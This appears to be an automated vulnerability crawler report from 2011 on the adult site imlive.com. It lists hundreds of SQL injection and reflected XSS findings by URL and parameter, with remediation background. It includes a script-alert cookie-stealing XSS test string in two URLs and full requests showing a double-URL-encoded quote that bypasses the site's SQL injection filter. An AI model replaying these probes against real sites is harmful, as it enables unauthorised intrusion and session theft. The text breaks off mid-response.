Cross Site Scripting, XSS, imlive.com, CWE-79, CAPEC-86

XSS in imlive.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Jan 28 11:58:12 CST 2011.



DORK CWE-79 XSS Report


1. SQL injection

1.1. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

1.2. http://de.imlive.com/waccess/ [REST URL parameter 1]

1.3. http://es.imlive.com/waccess/ [REST URL parameter 1]

1.4. http://fr.imlive.com/waccess/ [gotopage parameter]

1.5. http://gr.imlive.com/waccess/ [REST URL parameter 1]

1.6. http://it.imlive.com/waccess/ [REST URL parameter 1]

1.7. http://nl.imlive.com/waccess/ [REST URL parameter 1]

1.8. http://tr.imlive.com/waccess/ [REST URL parameter 1]

1.9. http://tr.imlive.com/waccess/ [gotopage parameter]

2. Cross-site scripting (reflected)

2.1. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.2. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.3. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

2.4. http://ar.imlive.com/waccess/ [cbname parameter]

2.5. http://ar.imlive.com/waccess/ [from parameter]

2.6. http://ar.imlive.com/waccess/ [promocode parameter]

2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

2.10. http://br.imlive.com/waccess/ [cbname parameter]

2.11. http://br.imlive.com/waccess/ [from parameter]

2.12. http://br.imlive.com/waccess/ [gotopage parameter]

2.13. http://br.imlive.com/waccess/ [promocode parameter]

2.14. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.15. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.16. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.17. http://cafr.imlive.com/waccess/ [cbname parameter]

2.18. http://cafr.imlive.com/waccess/ [from parameter]

2.19. http://cafr.imlive.com/waccess/ [gotopage parameter]

2.20. http://cafr.imlive.com/waccess/ [promocode parameter]

2.21. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

2.22. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

2.23. http://de.imlive.com/waccess/ [cbname parameter]

2.24. http://de.imlive.com/waccess/ [from parameter]

2.25. http://de.imlive.com/waccess/ [gotopage parameter]

2.26. http://de.imlive.com/waccess/ [promocode parameter]

2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

2.29. http://dk.imlive.com/waccess/ [cbname parameter]

2.30. http://dk.imlive.com/waccess/ [from parameter]

2.31. http://dk.imlive.com/waccess/ [gotopage parameter]

2.32. http://dk.imlive.com/waccess/ [promocode parameter]

2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

2.35. http://es.imlive.com/waccess/ [cbname parameter]

2.36. http://es.imlive.com/waccess/ [from parameter]

2.37. http://es.imlive.com/waccess/ [gotopage parameter]

2.38. http://es.imlive.com/waccess/ [promocode parameter]

2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.41. http://fr.imlive.com/waccess/ [gotopage parameter]

2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.44. http://gr.imlive.com/waccess/ [cbname parameter]

2.45. http://gr.imlive.com/waccess/ [from parameter]

2.46. http://gr.imlive.com/waccess/ [gotopage parameter]

2.47. http://gr.imlive.com/waccess/ [promocode parameter]

2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]

2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]

2.50. http://imlive.com/SiteInformation.html [REST URL parameter 1]

2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

2.53. http://imlive.com/become_celeb.asp [REST URL parameter 1]

2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]

2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]

2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]

2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]

2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]

2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]

2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]

2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]

2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]

2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]

2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]

2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

2.83. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

2.84. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

2.85. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

2.86. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter]

2.87. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

2.88. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter]

2.89. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

2.90. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter]

2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]

2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]

2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]

2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]

2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]

2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]

2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]

2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]

2.107. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

2.108. http://imlive.com/live-sex-chats/role-play/ [name of an arbitrarily supplied request parameter]

2.109. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

2.110. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

2.111. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

2.112. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

2.113. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

2.114. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

2.115. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]

2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]

2.125. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]

2.126. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]

2.127. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

2.128. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]

2.129. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

2.130. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]

2.131. http://imlive.com/sitemap.html [name of an arbitrarily supplied request parameter]

2.132. http://imlive.com/videosfr.asp [name of an arbitrarily supplied request parameter]

2.133. http://imlive.com/warningjx.aspx [redirect parameter]

2.134. http://imlive.com/warningms.asp [ms parameter]

2.135. http://imlive.com/warningms.asp [ms parameter]

2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]

2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]

2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]

2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

2.142. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]

2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

2.145. http://imlive.com/wmaster.ashx [gotopage parameter]

2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

2.148. http://in.imlive.com/waccess/ [gotopage parameter]

2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

2.151. http://it.imlive.com/waccess/ [gotopage parameter]

2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

2.153. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

2.154. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

2.155. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]

2.156. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

2.157. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter]

2.158. http://nl.imlive.com/waccess/ [gotopage parameter]

2.159. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

2.160. http://no.imlive.com/ [name of an arbitrarily supplied request parameter]

2.161. http://no.imlive.com/waccess/ [gotopage parameter]

2.162. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

2.163. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]

2.164. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

2.165. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

2.166. http://ru.imlive.com/waccess/ [gotopage parameter]

2.167. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

2.168. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

2.169. http://se.imlive.com/waccess/ [gotopage parameter]

2.170. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.171. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

2.172. http://ar.imlive.com/ [Referer HTTP header]

2.173. http://ar.imlive.com/waccess/ [Referer HTTP header]

2.174. http://br.imlive.com/ [Referer HTTP header]

2.175. http://br.imlive.com/waccess/ [Referer HTTP header]

2.176. http://cafr.imlive.com/ [Referer HTTP header]

2.177. http://cafr.imlive.com/waccess/ [Referer HTTP header]

2.178. http://de.imlive.com/ [Referer HTTP header]

2.179. http://de.imlive.com/waccess/ [Referer HTTP header]

2.180. http://dk.imlive.com/ [Referer HTTP header]

2.181. http://dk.imlive.com/waccess/ [Referer HTTP header]

2.182. http://es.imlive.com/ [Referer HTTP header]

2.183. http://es.imlive.com/waccess/ [Referer HTTP header]

2.184. http://fr.imlive.com/ [Referer HTTP header]

2.185. http://fr.imlive.com/waccess/ [Referer HTTP header]

2.186. http://gr.imlive.com/ [Referer HTTP header]

2.187. http://gr.imlive.com/waccess/ [Referer HTTP header]

2.188. http://imlive.com/ [Referer HTTP header]

2.189. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]

2.190. http://imlive.com/SiteInformation.html [Referer HTTP header]

2.191. http://imlive.com/awardarena/ [Referer HTTP header]

2.192. http://imlive.com/become_celeb.asp [Referer HTTP header]

2.193. http://imlive.com/become_host.asp [Referer HTTP header]

2.194. http://imlive.com/becomehost.aspx [Referer HTTP header]

2.195. http://imlive.com/categoryfs.asp [Referer HTTP header]

2.196. http://imlive.com/categoryfs.asp [Referer HTTP header]

2.197. http://imlive.com/categoryms.asp [Referer HTTP header]

2.198. http://imlive.com/categoryms.asp [Referer HTTP header]

2.199. http://imlive.com/customerservice.asp [Referer HTTP header]

2.200. http://imlive.com/disclaimer.asp [Referer HTTP header]

2.201. http://imlive.com/forgot.asp [Referer HTTP header]

2.202. http://imlive.com/forgot.aspx [Referer HTTP header]

2.203. http://imlive.com/homepagems3.asp [Referer HTTP header]

2.204. http://imlive.com/hostmembers.asp [Referer HTTP header]

2.205. http://imlive.com/live-sex-chats/ [Referer HTTP header]

2.206. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]

2.207. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]

2.208. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]

2.209. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]

2.210. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]

2.211. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]

2.212. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]

2.213. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]

2.214. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]

2.215. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]

2.216. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]

2.217. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]

2.218. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]

2.219. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]

2.220. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]

2.221. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]

2.222. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]

2.223. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]

2.224. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]

2.225. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]

2.226. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]

2.227. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]

2.228. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]

2.229. http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header]

2.230. http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header]

2.231. http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header]

2.232. http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header]

2.233. http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header]

2.234. http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header]

2.235. http://imlive.com/liveexperts.asp [Referer HTTP header]

2.236. http://imlive.com/localcompanionship.asp [Referer HTTP header]

2.237. http://imlive.com/login.asp [Referer HTTP header]

2.238. http://imlive.com/minglesingles.asp [Referer HTTP header]

2.239. http://imlive.com/pr.asp [Referer HTTP header]

2.240. http://imlive.com/preparesearch.asp [Referer HTTP header]

2.241. http://imlive.com/preparesearch.aspx [Referer HTTP header]

2.242. http://imlive.com/search.asp [Referer HTTP header]

2.243. http://imlive.com/sitemap.html [Referer HTTP header]

2.244. http://imlive.com/videosfr.asp [Referer HTTP header]

2.245. http://imlive.com/warningms.asp [Referer HTTP header]

2.246. http://imlive.com/webcam-advanced-search/ [Referer HTTP header]

2.247. http://imlive.com/webcam-faq/ [Referer HTTP header]

2.248. http://imlive.com/webcam-login/ [Referer HTTP header]

2.249. http://imlive.com/webcam-sign-up/ [Referer HTTP header]

2.250. http://imlive.com/wmaster.ashx [Referer HTTP header]

2.251. http://imlive.com/wmaster.ashx [Referer HTTP header]

2.252. http://in.imlive.com/ [Referer HTTP header]

2.253. http://in.imlive.com/waccess/ [Referer HTTP header]

2.254. http://it.imlive.com/ [Referer HTTP header]

2.255. http://it.imlive.com/waccess/ [Referer HTTP header]

2.256. http://jp.imlive.com/ [Referer HTTP header]

2.257. http://jp.imlive.com/waccess/ [Referer HTTP header]

2.258. http://mx.imlive.com/ [Referer HTTP header]

2.259. http://mx.imlive.com/waccess/ [Referer HTTP header]

2.260. http://nl.imlive.com/ [Referer HTTP header]

2.261. http://nl.imlive.com/waccess/ [Referer HTTP header]

2.262. http://no.imlive.com/ [Referer HTTP header]

2.263. http://no.imlive.com/waccess/ [Referer HTTP header]

2.264. http://pu.imlive.com/ [Referer HTTP header]

2.265. http://pu.imlive.com/waccess/ [Referer HTTP header]

2.266. http://ru.imlive.com/ [Referer HTTP header]

2.267. http://ru.imlive.com/waccess/ [Referer HTTP header]

2.268. http://se.imlive.com/ [Referer HTTP header]

2.269. http://se.imlive.com/waccess/ [Referer HTTP header]

2.270. http://tr.imlive.com/ [Referer HTTP header]

2.271. http://tr.imlive.com/waccess/ [Referer HTTP header]

3. Cleartext submission of password

3.1. http://ar.imlive.com/

3.2. http://br.imlive.com/

3.3. http://cafr.imlive.com/

3.4. http://de.imlive.com/

3.5. http://dk.imlive.com/

3.6. http://es.imlive.com/

3.7. http://fr.imlive.com/

3.8. http://gr.imlive.com/

3.9. http://imlive.com/

3.10. http://imlive.com/homepagems3.asp

3.11. http://imlive.com/webcam-login/

3.12. http://in.imlive.com/

3.13. http://it.imlive.com/

3.14. http://jp.imlive.com/

3.15. http://mx.imlive.com/

3.16. http://nl.imlive.com/

3.17. http://no.imlive.com/

3.18. http://pu.imlive.com/

3.19. http://ru.imlive.com/

3.20. http://se.imlive.com/

3.21. http://tr.imlive.com/

4. Cookie without HttpOnly flag set

4.1. http://imlive.com/homepagems3.asp

4.2. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

4.3. http://ar.imlive.com/

4.4. http://ar.imlive.com/waccess/

4.5. http://br.imlive.com/

4.6. http://br.imlive.com/waccess/

4.7. http://cafr.imlive.com/

4.8. http://cafr.imlive.com/waccess/

4.9. http://de.imlive.com/

4.10. http://de.imlive.com/waccess/

4.11. http://dk.imlive.com/

4.12. http://dk.imlive.com/waccess/

4.13. http://es.imlive.com/

4.14. http://es.imlive.com/waccess/

4.15. http://fr.imlive.com/

4.16. http://fr.imlive.com/waccess/

4.17. http://gr.imlive.com/

4.18. http://gr.imlive.com/waccess/

4.19. http://imlive.com/

4.20. http://imlive.com/GuestDiscountClubs.aspx

4.21. http://imlive.com/awardarena/

4.22. http://imlive.com/becomehost.aspx

4.23. http://imlive.com/categoryfs.asp

4.24. http://imlive.com/categoryms.asp

4.25. http://imlive.com/disclaimer.asp

4.26. http://imlive.com/live-sex-chats/

4.27. http://imlive.com/live-sex-chats/adult-shows/

4.28. http://imlive.com/live-sex-chats/cam-girls/

4.29. http://imlive.com/live-sex-chats/cam-girls/categories/

4.30. http://imlive.com/live-sex-chats/cam-girls/hotspots/

4.31. http://imlive.com/live-sex-chats/cams-aroundthehouse/

4.32. http://imlive.com/live-sex-chats/caught-on-cam/

4.33. http://imlive.com/live-sex-chats/couple/

4.34. http://imlive.com/live-sex-chats/fetish/

4.35. http://imlive.com/live-sex-chats/fetish/categories/

4.36. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/

4.37. http://imlive.com/live-sex-chats/free-sex-video/

4.38. http://imlive.com/live-sex-chats/gay-couple/

4.39. http://imlive.com/live-sex-chats/gay/

4.40. http://imlive.com/live-sex-chats/guy-alone/

4.41. http://imlive.com/live-sex-chats/happyhour/

4.42. http://imlive.com/live-sex-chats/lesbian-couple/

4.43. http://imlive.com/live-sex-chats/lesbian/

4.44. http://imlive.com/live-sex-chats/live-sex-video/

4.45. http://imlive.com/live-sex-chats/nude-chat/

4.46. http://imlive.com/live-sex-chats/orgies/

4.47. http://imlive.com/live-sex-chats/pornstars/

4.48. http://imlive.com/live-sex-chats/role-play/

4.49. http://imlive.com/live-sex-chats/sex-show-galleries/

4.50. http://imlive.com/live-sex-chats/sex-show-photos/

4.51. http://imlive.com/live-sex-chats/sex-show-sessions/

4.52. http://imlive.com/live-sex-chats/sex-video-features/

4.53. http://imlive.com/live-sex-chats/shemale-couple/

4.54. http://imlive.com/live-sex-chats/shemale/

4.55. http://imlive.com/live-sex-chats/shy-girl/

4.56. http://imlive.com/liveexperts.asp

4.57. http://imlive.com/localcompanionship.asp

4.58. http://imlive.com/minglesingles.asp

4.59. http://imlive.com/pr.asp

4.60. http://imlive.com/preparesearch.aspx

4.61. http://imlive.com/sex_webcams_index/index.asp

4.62. http://imlive.com/sitemap.html

4.63. http://imlive.com/videosfr.asp

4.64. http://imlive.com/warningms.asp

4.65. http://imlive.com/webcam-advanced-search/

4.66. http://imlive.com/webcam-faq/

4.67. http://imlive.com/webcam-login/

4.68. http://imlive.com/webcam-sign-up/

4.69. http://imlive.com/wmaster.ashx

4.70. http://in.imlive.com/

4.71. http://in.imlive.com/waccess/

4.72. http://it.imlive.com/

4.73. http://it.imlive.com/waccess/

4.74. http://jp.imlive.com/

4.75. http://jp.imlive.com/waccess/

4.76. http://mx.imlive.com/

4.77. http://mx.imlive.com/waccess/

4.78. http://nl.imlive.com/

4.79. http://nl.imlive.com/waccess/

4.80. http://no.imlive.com/

4.81. http://no.imlive.com/waccess/

4.82. http://pu.imlive.com/

4.83. http://pu.imlive.com/waccess/

4.84. http://ru.imlive.com/

4.85. http://ru.imlive.com/waccess/

4.86. http://se.imlive.com/

4.87. http://se.imlive.com/waccess/

4.88. http://tr.imlive.com/

4.89. http://tr.imlive.com/waccess/

5. Password field with autocomplete enabled

5.1. http://ar.imlive.com/

5.2. http://br.imlive.com/

5.3. http://cafr.imlive.com/

5.4. http://de.imlive.com/

5.5. http://dk.imlive.com/

5.6. http://es.imlive.com/

5.7. http://fr.imlive.com/

5.8. http://gr.imlive.com/

5.9. http://imlive.com/

5.10. http://imlive.com/homepagems3.asp

5.11. http://imlive.com/webcam-login/

5.12. http://in.imlive.com/

5.13. http://it.imlive.com/

5.14. http://jp.imlive.com/

5.15. http://mx.imlive.com/

5.16. http://nl.imlive.com/

5.17. http://no.imlive.com/

5.18. http://pu.imlive.com/

5.19. http://ru.imlive.com/

5.20. http://se.imlive.com/

5.21. http://tr.imlive.com/

6. HTML does not specify charset

6.1. http://br.imlive.com/NaN/

6.2. http://cafr.imlive.com/NaN/

6.3. http://imlive.com/categoryfs.asp

6.4. http://imlive.com/categoryms.asp

6.5. http://imlive.com/compliance.asp

6.6. http://imlive.com/disclaimer.asp

6.7. http://imlive.com/homepagems3.asp

6.8. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

6.9. http://imlive.com/liveexperts.asp

6.10. http://imlive.com/localcompanionship.asp

6.11. http://imlive.com/minglesingles.asp

6.12. http://imlive.com/pr.asp

6.13. http://imlive.com/sex_webcams_index/index.asp

6.14. http://imlive.com/sitemap.html

6.15. http://imlive.com/videosfr.asp

6.16. http://imlive.com/warningms.asp



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cafr.imlive.com
Path:   /waccess/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 8336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
